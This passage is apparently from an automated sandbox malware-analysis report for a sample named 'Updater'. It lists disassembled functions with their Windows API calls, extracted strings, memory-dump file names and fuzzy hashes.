Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: 5b5319abb9c1c02bce178bce1dcb17810cc84bf7a5dc6f3b488b88e28e4699e5
Instruction ID: 6d57e9209a4b592c7a6512565fa54bae414a68196cdf55e9ee40e9b201080254
Opcode Fuzzy Hash: 5b5319abb9c1c02bce178bce1dcb17810cc84bf7a5dc6f3b488b88e28e4699e5
Instruction Fuzzy Hash: 78618831500701DFDB299F14D988B3AB7F1FF41316F2056A9E18657AA0CBB4B890DF81

Function 00B349E2 Relevance: 18.1, APIs: 12, Instructions: 139COMMON

Download Yara Rule

APIs

Part of subcall function 00B34E23: GetWindowLongW.USER32(?,000000EB), ref: 00B34E34

GetSysColor.USER32(0000000F), ref: 00B34A11

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: f9d03ab419e10b36d8dc30a6c30f0a41de15f0f0d68bc940c88cbe313b4c5c02
Instruction ID: ea550348bfdfb0304b4f8a84ef009d4f45116c144ca36d6f1b5ca2f97cfc1017
Opcode Fuzzy Hash: f9d03ab419e10b36d8dc30a6c30f0a41de15f0f0d68bc940c88cbe313b4c5c02
Instruction Fuzzy Hash: F441C135184604AFCB309F389C88BB93BE5EB45331F244795FAA6872E1DB71AC41DB14

Function 00B8A4B0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 138windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,?,00000000,?,?,00B76680,?,0000138C,?,?,?,?,00B9EFB0,?), ref: 00B8A4E5
LoadStringW.USER32(00000000,?,00B76680,?), ref: 00B8A4EE

Part of subcall function 00B2FA3B: _wcslen.LIBCMT ref: 00B2FA45

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,00B76680,?,0000138C,?,?,?,?,00B9EFB0,?,?), ref: 00B8A510
LoadStringW.USER32(00000000,?,00B76680,?), ref: 00B8A513
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00B8A634

Strings

^ ERROR, xrefs: 00B8A5C9
%s (%d) : ==> %s: %s %s, xrefs: 00B8A618
Line %d (File "%s"):, xrefs: 00B8A55D
Error: , xrefs: 00B8A5EB
Line %d:, xrefs: 00B8A56E

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wcslen
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 747408836-2268648507
Opcode ID: 16ad420cacfa503583e15623b53508234928c5210ce81a62905b2a0e9c9ce9ad
Instruction ID: 065eff540123f763c3e48a2f12a541b59d4766302f853bec151d6aa3ab612ce3
Opcode Fuzzy Hash: 16ad420cacfa503583e15623b53508234928c5210ce81a62905b2a0e9c9ce9ad
Instruction Fuzzy Hash: 5D41207280011AAADB04FBE4ED96DFE77B9AF18700F5005B5F605720A2EE356F49CB61

Function 00B81785 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 128registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 00B2F82C: _wcslen.LIBCMT ref: 00B2F83F

WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00B81849
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00B81865
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00B81881
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00B818AB
CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 00B818D3
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00B818DE
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00B818E3

Strings

\CLSID, xrefs: 00B817CB
SOFTWARE\Classes\, xrefs: 00B817B5
\IPC$, xrefs: 00B8182B

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 323675364-22481851
Opcode ID: 6014113db908af529434c71531aa93c33a63a76e0fe2d9eb325ee7dc78e040d6
Instruction ID: 8177c6851b805aea4aeaed6c307e7f32382be95ed7db1dfbc4aef792f5f5250c
Opcode Fuzzy Hash: 6014113db908af529434c71531aa93c33a63a76e0fe2d9eb325ee7dc78e040d6
Instruction Fuzzy Hash: 94410572C1022DABCF11EBA4EC959EEB7B8FF18750F0045B9E805A3160EB309E45CB90

Function 00BB4951 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00BB49F4
CreateCompatibleDC.GDI32(00000000), ref: 00BB49FB
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00BB4A0E
SelectObject.GDI32(00000000,00000000), ref: 00BB4A16
GetPixel.GDI32(00000000,00000000,00000000), ref: 00BB4A21
DeleteDC.GDI32(00000000), ref: 00BB4A2B
GetWindowLongW.USER32(?,000000EC), ref: 00BB4A35
SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 00BB4A4B
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 00BB4A57

Strings

static, xrefs: 00BB498C

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: ad745a681adcc4ffdde6f2af60038e3f9c2ae4fdd801f2d0dd529daac477b68a
Instruction ID: 239119ce0b9d596fc02b3623dcdd5ab62bfa35c818a3ec4bb4200beb0306f008
Opcode Fuzzy Hash: ad745a681adcc4ffdde6f2af60038e3f9c2ae4fdd801f2d0dd529daac477b68a
Instruction Fuzzy Hash: 9C316031100219AFDF119FA4DC49FEB3BA9FF09714F110361FA69A61A1DBB9D810DB94

Function 00B9854F Relevance: 16.8, APIs: 11, Instructions: 299comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00B985AC
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00B98648
SHGetDesktopFolder.SHELL32(?), ref: 00B9865C
CoCreateInstance.OLE32(00BC0CBC,00000000,00000001,00BE7C9C,?), ref: 00B986A8
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00B9872D
CoTaskMemFree.OLE32(?), ref: 00B98785
SHBrowseForFolderW.SHELL32(?), ref: 00B98810
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00B98833
CoTaskMemFree.OLE32(00000000), ref: 00B9883A
CoTaskMemFree.OLE32(00000000), ref: 00B9888F
CoUninitialize.OLE32 ref: 00B98895

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
String ID:
API String ID: 2762341140-0
Opcode ID: f4476787cdaf7045cd2508aad89cd527c12782ad48ed32741339f7b2c981618c
Instruction ID: f7b1ff5443bf23e386b72c8c381c4cb0ddd79bb770117b564716187ac31e050b
Opcode Fuzzy Hash: f4476787cdaf7045cd2508aad89cd527c12782ad48ed32741339f7b2c981618c
Instruction Fuzzy Hash: C1C13975A00119EFCB14DFA4D884DAEBBF9FF49304B1485A8E51A9B361DB34EE41CB90

Function 00B80B44 Relevance: 16.6, APIs: 11, Instructions: 127memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00B80B6B
SafeArrayAllocData.OLEAUT32(?), ref: 00B80BCD
VariantInit.OLEAUT32(?), ref: 00B80BDF
SafeArrayAccessData.OLEAUT32(?,?), ref: 00B80BFF
VariantCopy.OLEAUT32(?,?), ref: 00B80C52
SafeArrayUnaccessData.OLEAUT32(?), ref: 00B80C66
VariantClear.OLEAUT32(?), ref: 00B80C7B
SafeArrayDestroyData.OLEAUT32(?), ref: 00B80C88
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00B80C91
VariantClear.OLEAUT32(?), ref: 00B80CA3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00B80CAE

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 118f4b9c90fb43db1fb1e92045593b8cdd1e3b40d80a8c993e9c468bc6ae7c71
Instruction ID: a9fb3862c2cb9bfc21e7979608075a552fe66206f60352c9095487b1d9b60b18
Opcode Fuzzy Hash: 118f4b9c90fb43db1fb1e92045593b8cdd1e3b40d80a8c993e9c468bc6ae7c71
Instruction Fuzzy Hash: CC417D75E00219AFCF00EF94D8449AEBBF8FF48354F0081A9E955A7361DB74AA49CF90

Function 00B988AB Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 235COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00B98A68
SetCurrentDirectoryW.KERNEL32(?), ref: 00B98A7C
GetFileAttributesW.KERNEL32(?), ref: 00B98A9B
GetFileAttributesW.KERNEL32(?), ref: 00B98AB3
SetFileAttributesW.KERNEL32(?,00000000), ref: 00B98AC9
SetCurrentDirectoryW.KERNEL32(?), ref: 00B98ADB
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00B98B27
SetCurrentDirectoryW.KERNEL32(?), ref: 00B98B30

Strings

*.*, xrefs: 00B98B36

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile
String ID: *.*
API String ID: 769691225-438819550
Opcode ID: 3466b752e81ffa819aa8c179a89a94246ac9093491108f1bcd9d884c2c79674d
Instruction ID: 75f63c3fa7059698cb2e2c0e48ede8ad4c90fb27ba97e4d642124b499311879e
Opcode Fuzzy Hash: 3466b752e81ffa819aa8c179a89a94246ac9093491108f1bcd9d884c2c79674d
Instruction Fuzzy Hash: 9D8190725042059BCF20EF54C884A7EB3E8FF8A310F1858AAF989DB251DB75E945CB53

Function 00BA1125 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00BA1186
inet_addr.WSOCK32(?), ref: 00BA11E6
gethostbyname.WSOCK32(?), ref: 00BA11F2
IcmpCreateFile.IPHLPAPI ref: 00BA1200
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00BA1290
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00BA12AF
IcmpCloseHandle.IPHLPAPI(?), ref: 00BA1383
WSACleanup.WSOCK32 ref: 00BA1389

Strings

Ping, xrefs: 00BA1240

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: bf046e650bc804c32f0382fedf88e5453af50b6dfdc50b120ff769902d0f4e64
Instruction ID: 017dc3b9a0a8fed73129a494cadc4d8564a8adb2a699f80a9ba3753273884940
Opcode Fuzzy Hash: bf046e650bc804c32f0382fedf88e5453af50b6dfdc50b120ff769902d0f4e64
Instruction Fuzzy Hash: 0C91B270608201AFD760DF19C888F1ABBE4EF46318F1489E9F5699B7A2C734ED41CB91

Function 00BA42A7 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 202comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00BA42F1
CoUninitialize.OLE32 ref: 00BA42FB
CoCreateInstance.OLE32(?,00000000,00000017,00BC0B2C,?), ref: 00BA4367
IIDFromString.OLE32(00000000,?), ref: 00BA43D8
VariantInit.OLEAUT32(?), ref: 00BA447B
VariantClear.OLEAUT32(?), ref: 00BA44CD

Strings

Failed to create object, xrefs: 00BA4372, 00BA4426
Invalid parameter, xrefs: 00BA43F1
NULL Pointer assignment, xrefs: 00BA43A7

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 636576611-1287834457
Opcode ID: 151d97fb4ec786a94d6752fbd617b1674a2e3946e3f9f6e6dc86c2523d95ef20
Instruction ID: 0100665095f2113d78710d92562c7a2147a310e03f5b5f6f3aa7a4146cd55c91
Opcode Fuzzy Hash: 151d97fb4ec786a94d6752fbd617b1674a2e3946e3f9f6e6dc86c2523d95ef20
Instruction Fuzzy Hash: EC71BD30208300DFCB20DF14D888B6EBBE4EF8A715F144899F9859B261DBB4ED49CB56

Function 00BA96F4 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 158COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,00000000,00000000,?), ref: 00BA9716

Part of subcall function 00B89D33: _wcslen.LIBCMT ref: 00B89D56

_wcslen.LIBCMT ref: 00BA9770
_wcslen.LIBCMT ref: 00BA97B4
_wcslen.LIBCMT ref: 00BA97EF
_wcslen.LIBCMT ref: 00BA9872

Strings

winapi, xrefs: 00BA97AF, 00BA97C2
none, xrefs: 00BA986D, 00BA987E
stdcall, xrefs: 00BA97EA, 00BA97FF
cdecl, xrefs: 00BA976B, 00BA9784

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: _wcslen$BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 707087890-567219261
Opcode ID: 7c0fcda8b9a45e13bf9e5207dc9b3221020b6a25268693fb40a913d55a404f46
Instruction ID: fa0fc3bfec52f3c888d9ae51bef0b9ff14f8a97fc87cf22df49e5bce42344f78
Opcode Fuzzy Hash: 7c0fcda8b9a45e13bf9e5207dc9b3221020b6a25268693fb40a913d55a404f46
Instruction Fuzzy Hash: 93510435A081129BCF149F6CC8815BE73F6EF97750F1086ADE82997395EB32AD01D790

Function 00B94142 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 150COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF), ref: 00B94189

Part of subcall function 00B2FA3B: _wcslen.LIBCMT ref: 00B2FA45

LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00B941AA

Strings

Line %d (File "%s"):, xrefs: 00B941FD, 00B94216
"%s" (%d) : ==> %s:%s%s, xrefs: 00B942BE
"%s" (%d) : ==> %s:, xrefs: 00B942DC
Error: , xrefs: 00B9428B
Incorrect parameters to object property !, xrefs: 00B94265
^ ERROR , xrefs: 00B94258

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-3080491070
Opcode ID: 87772f28e78e0e0aa2d2a5bfbca5dabd11e26668001bb2955d15cd97cf2fa525
Instruction ID: 7421ba5699ba854d12f2b288888ad9d594cc5a88e1167d98d5a04e86474d44da
Opcode Fuzzy Hash: 87772f28e78e0e0aa2d2a5bfbca5dabd11e26668001bb2955d15cd97cf2fa525
Instruction Fuzzy Hash: BD515B7190021AAADF14EBE0DD82EFEB7F9AF08300F1045F5B509620A2EB356F59DB51

Function 00B8C439 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 107COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00B8C46E
_wcslen.LIBCMT ref: 00B8C479
_wcslen.LIBCMT ref: 00B8C4B4
_wcslen.LIBCMT ref: 00B8C4E7
_wcslen.LIBCMT ref: 00B8C521

Strings

EXISTS, xrefs: 00B8C4E2, 00B8C4F5
KEYS, xrefs: 00B8C4AF, 00B8C4C2
APPEND, xrefs: 00B8C51C, 00B8C52D
REMOVE, xrefs: 00B8C474, 00B8C487

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 1256254125-769500911
Opcode ID: 31e9265f0e01263bc19e5488c353ec4f78769ce0d8c12825768a367c9757c4be
Instruction ID: bb53b4b97be4aeff8064b51f333cbea0d490c8c63d5be90fe9bb9d78fd196606
Opcode Fuzzy Hash: 31e9265f0e01263bc19e5488c353ec4f78769ce0d8c12825768a367c9757c4be
Instruction Fuzzy Hash: 4D31F4F6E0012147CF207B6C98525FA7BE5EB75310B1880EADD0687324FB71AD42CB65

Function 00BB45EF Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 103windowCOMMON

Download Yara Rule

APIs

CreateMenu.USER32 ref: 00BB4622
SetMenu.USER32(?,00000000), ref: 00BB4631
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00BB46BE
IsMenu.USER32(?), ref: 00BB46D2
CreatePopupMenu.USER32 ref: 00BB46DC
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00BB4709
DrawMenuBar.USER32 ref: 00BB4711

Strings

0, xrefs: 00BB45FD
F, xrefs: 00BB46FD

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup
String ID: 0$F
API String ID: 161812096-3044882817
Opcode ID: e4466d3bd6d51861410d06b8108c97100a7e0829ca6daa1e2afff72f339efef6
Instruction ID: c1f94613d86841c04e8f32a8ed4d12f937fda3aa2fae883069a806134b9739ae
Opcode Fuzzy Hash: e4466d3bd6d51861410d06b8108c97100a7e0829ca6daa1e2afff72f339efef6
Instruction Fuzzy Hash: 41416978A01209AFDB24CFA5E884AEA7BF5FF0A354F1401A8FD4697351DBB0AD10CB50

Function 00B82F90 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 79windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B2FA3B: _wcslen.LIBCMT ref: 00B2FA45

Part of subcall function 00B84D36: GetClassNameW.USER32(?,?,000000FF), ref: 00B84D59

SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 00B83015
GetDlgCtrlID.USER32 ref: 00B83020
GetParent.USER32 ref: 00B8303C
SendMessageW.USER32(00000000,?,00000111,?), ref: 00B8303F
GetDlgCtrlID.USER32(?), ref: 00B83048
GetParent.USER32(?), ref: 00B8305C
SendMessageW.USER32(00000000,?,00000111,?), ref: 00B8305F

Strings

ListBox, xrefs: 00B82FD2
ComboBox, xrefs: 00B82F9D

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_wcslen
String ID: ComboBox$ListBox
API String ID: 711023334-1403004172
Opcode ID: c7fe2eb6ff9478e749d4ebcd387ab18d1ef77efe833a3532644a1687eb9c7dac
Instruction ID: bf80b38bceee8947eaaaec19f427ad748da69323397b35a149be33829d64a94c
Opcode Fuzzy Hash: c7fe2eb6ff9478e749d4ebcd387ab18d1ef77efe833a3532644a1687eb9c7dac
